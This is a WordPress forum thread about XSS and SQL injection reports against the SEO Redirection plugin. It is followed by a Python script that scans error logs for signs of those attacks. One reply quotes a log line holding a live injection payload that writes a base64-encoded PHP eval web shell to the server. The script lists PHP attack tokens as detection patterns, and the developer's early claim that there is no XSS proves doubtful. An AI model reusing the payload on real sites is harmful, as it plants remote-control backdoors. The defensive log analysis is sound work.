Title: Vulnerability Found
Last modified: August 30, 2016

---

# Vulnerability Found

 *  Resolved [daveteeee](https://wordpress.org/support/users/daveteeee/)
 * (@daveteeee)
 * [10 years, 11 months ago](https://wordpress.org/support/topic/vulnerability-found/)
 * I am getting this report “Vulnerability found: SEO Redirection <= 2.2 – Unauthenticated
   Stored Cross-Site Scripting (XSS)”
 * from plugin security scanner plugin. Should I be concerned?
 * [https://wordpress.org/plugins/seo-redirection/](https://wordpress.org/plugins/seo-redirection/)

Viewing 8 replies - 1 through 8 (of 8 total)

 *  [Fakhri Alsadi](https://wordpress.org/support/users/fakhris/)
 * (@fakhris)
 * [10 years, 11 months ago](https://wordpress.org/support/topic/vulnerability-found/#post-6321495)
 * I tested the plugin and it displayed the same message to me, but there is no XSS
   in the plugin; ignore this message. I will try to change the parameter names
   or the tag name to stop this message from appearing.
 *  [studioexcel](https://wordpress.org/support/users/studioexcel/)
 * (@studioexcel)
 * [10 years, 9 months ago](https://wordpress.org/support/topic/vulnerability-found/#post-6321858)
 * Hi Fakhri,
 * First of all – great plugin. Came in handy many times. However, one
   of my websites got hacked (sort of) recently. Weirdly the file system was clean
   but as I started digging it turned out that the SEO_404_links table was full
   of spammy links to some drug websites. As a result Google picked up dozens of
   non-existent PDFs which were in reality redirects to some dodgy websites. I
   truncated the tables and removed the plugin (which solved the issue but still
   a long way before Google removes the “hacked” flag from search results) but the
   situation could indicate that there is indeed a vulnerability that allows such
   hacks. I’d be happy to open a dialog with you about this potential issue.
 *  [Fakhri Alsadi](https://wordpress.org/support/users/fakhris/)
 * (@fakhris)
 * [10 years, 9 months ago](https://wordpress.org/support/topic/vulnerability-found/#post-6321860)
 * Please contact me at [http://www.clogica.com/contact-us](http://www.clogica.com/contact-us)
   and send a screenshot of these links to address the issue!
 *  [adithya.bhat](https://wordpress.org/support/users/adithyabhat/)
 * (@adithyabhat)
 * [10 years, 8 months ago](https://wordpress.org/support/topic/vulnerability-found/#post-6321871)
 * Hi Fakhri,
 * Good day!
 * I have installed this plugin on one of my sites and it got hacked around 3 weeks
   back and Google displayed “This site might have been hacked” message in the search
   results. With great difficulty we removed that message from Google search results.
   But our site got hacked again yesterday, so we did an investigation on this using
   some tools and we found a vulnerability in the plugin. Please see the below message
   displayed on the tool which we are using.
 * > XSS Vulnerability in SEO Redirection Plugin
 * Continuing further investigation we also found that malicious javascript code
   can be injected by anyone. Can you please look into this and let us know if any
   of this is true?
 * > SEO Redirection Plugin is vulnerable to stored XSS. On the “Settings > SEO 
   > Redirection > Redirection History” screen the referer link is not filtered.
   > Malicious javascript code can be injected by anyone.
 * Thank you for your time. Have a nice day.
 *  [Fakhri Alsadi](https://wordpress.org/support/users/fakhris/)
 * (@fakhris)
 * [10 years, 8 months ago](https://wordpress.org/support/topic/vulnerability-found/#post-6321872)
 * Hi,
 * I will check this issue and solve it soon.
 * Thank you
 *  [yellows12](https://wordpress.org/support/users/yellows12/)
 * (@yellows12)
 * [10 years, 1 month ago](https://wordpress.org/support/topic/vulnerability-found/#post-6321885)
 * Hi Fakhri,
 * One of my websites was recently hacked and my web developer tells me this was
   due to an SQL injection on your plugin.
 * Can you confirm this?
 * Thanks,
 * Simon
 *  [the_specialist2005](https://wordpress.org/support/users/the_specialist2005/)
 * (@the_specialist2005)
 * [9 years, 11 months ago](https://wordpress.org/support/topic/vulnerability-found/#post-6321887)
 * My site was hacked. In the error log I found this line:
 * > [16-Jun-2016 04:48:21 UTC] WordPress database error You have an error in your
   > SQL syntax;
   >  check the manual that corresponds to your MySQL server version
   > for the right syntax to use near ‘>|’; file_put_contents($_SERVER[‘DOCUMENT_ROOT’].’/
   > webconfig.txt.php’,base64_deco’ at line 1 for query select * from cbhac_WP_SEO_Redirection
   > where enabled=1 and regex=” and (redirect_from=’/?1=@ini_set(“display_errors”,”
   > 0″); @set_time_limit(0); @set_magic_quotes_runtime(0);
   > echo ‘->|’;
   > file_put_contents($_SERVER[‘DOCUMENT_ROOT’].’/webconfig.txt.php’,base64_decode(‘
   > PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+’));
   >  echo ‘|<-‘;’
   > or redirect_from=’/?1=@ini_set(“display_errors”,”0″);
   > @set_time_limit(0);@set_magic_quotes_runtime(0);
   > echo ‘->|’;
   > file_put_contents($_SERVER[‘DOCUMENT_ROOT’].’/webconfig.txt.php’,base64_decode(‘
   > PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+’));
   >  echo ‘|<-‘;/’ ) made by require(‘wp-blog-
   > header.php’), wp, WP->main, do_action_ref_array, call_user_func_array, WPSR_redirect,
   > W3_Db->query, W3_DbCache->query, W3_DbCallUnderlying->query, W3_Db->query, 
   > W3_DbProcessor->query, W3_Db->default_query
 *  [esmi](https://wordpress.org/support/users/esmi/)
 * (@esmi)
 * [9 years, 11 months ago](https://wordpress.org/support/topic/vulnerability-found/#post-6321888)
 * **[@the_specialist2005](https://wordpress.org/support/users/the_specialist2005/)**:
   This is not your topic. If you require assistance then, as per the [Forum Welcome](https://codex.wordpress.org/Forum_Welcome#Where_To_Post),
   please post your own topic.
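
The error-log line quoted in the thread above can be turned into a log check. The following is an added example, not code from any participant or from the plugin: it groups multi-line PHP error_log entries, keeps "WordPress database error" entries whose query touches a table ending in `_WP_SEO_Redirection` (the name seen in the quoted log), and flags PHP code tokens inside the query. The sample log is constructed, with payload bodies replaced by placeholders and an assumed `wp_` table prefix.

```python
import re
from datetime import datetime

# Constructed sample of a PHP error_log; payload bodies are placeholders.
SAMPLE_LOG = """\
[16-Jun-2016 04:48:21 UTC] WordPress database error You have an error in your SQL syntax; check the manual near '>|'; file_put_contents(' at line 1 for query select * from wp_WP_SEO_Redirection where enabled=1 and regex='' and (redirect_from='/?1=@ini_set("display_errors","0");
echo '->|';
file_put_contents($_SERVER['DOCUMENT_ROOT'].'/PLACEHOLDER.php',base64_decode('PLACEHOLDER'));
echo '|<-';/' ) made by require('wp-blog-header.php'), wp, WP->main, WPSR_redirect
[16-Jun-2016 05:02:10 UTC] WordPress database error Table 'db.wp_stats' doesn't exist for query SELECT id FROM wp_stats made by require('wp-blog-header.php'), wp
[16-Jun-2016 05:03:00 UTC] PHP Notice:  Undefined index: foo in /var/www/html/index.php on line 3
"""

ENTRY_START = re.compile(r"^\[(\d{2}-[A-Za-z]{3}-\d{4} \d{2}:\d{2}:\d{2}) UTC\] ")
DB_ERROR = re.compile(
    r"WordPress database error (?P<error>.*?) for query (?P<query>.*) made by (?P<chain>.*)",
    re.S)
# Tokens that never belong in a request path compared against redirect_from.
CODE_MARKERS = ("file_put_contents", "base64_decode", "eval(", "@ini_set", "$_SERVER", "$_POST")

def split_entries(text):
    """Group physical lines into entries; a logged query may span several lines."""
    entries = []
    for line in text.splitlines():
        if ENTRY_START.match(line) or not entries:
            entries.append(line)
        else:
            entries[-1] += "\n" + line
    return entries

def suspicious_db_errors(text, table_suffix="_WP_SEO_Redirection"):
    """Return DB-error entries on the redirect table whose query carries PHP code."""
    hits = []
    for entry in split_entries(text):
        ts, db = ENTRY_START.match(entry), DB_ERROR.search(entry)
        if not (ts and db) or table_suffix.lower() not in db["query"].lower():
            continue
        markers = [m for m in CODE_MARKERS if m in db["query"]]
        if markers:
            hits.append({
                "time": datetime.strptime(ts[1], "%d-%b-%Y %H:%M:%S"),
                "markers": markers,
                "chain": [c.strip() for c in db["chain"].split(",")],
            })
    return hits

if __name__ == "__main__":
    for hit in suspicious_db_errors(SAMPLE_LOG):
        print(hit["time"].isoformat(), hit["chain"][-1], ", ".join(hit["markers"]))
```

A hit means a request path reached the SQL parser with unescaped quotes; it shows the query was injectable at that time, not whether any file was written, so follow up by checking the document root for unexpected `.php` files.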

The topic ‘Vulnerability Found’ is closed to new replies.

 * 8 replies
 * 7 participants
 * Last reply from: [esmi](https://wordpress.org/support/users/esmi/)
 * Last activity: [9 years, 11 months ago](https://wordpress.org/support/topic/vulnerability-found/#post-6321888)
 * Status: resolved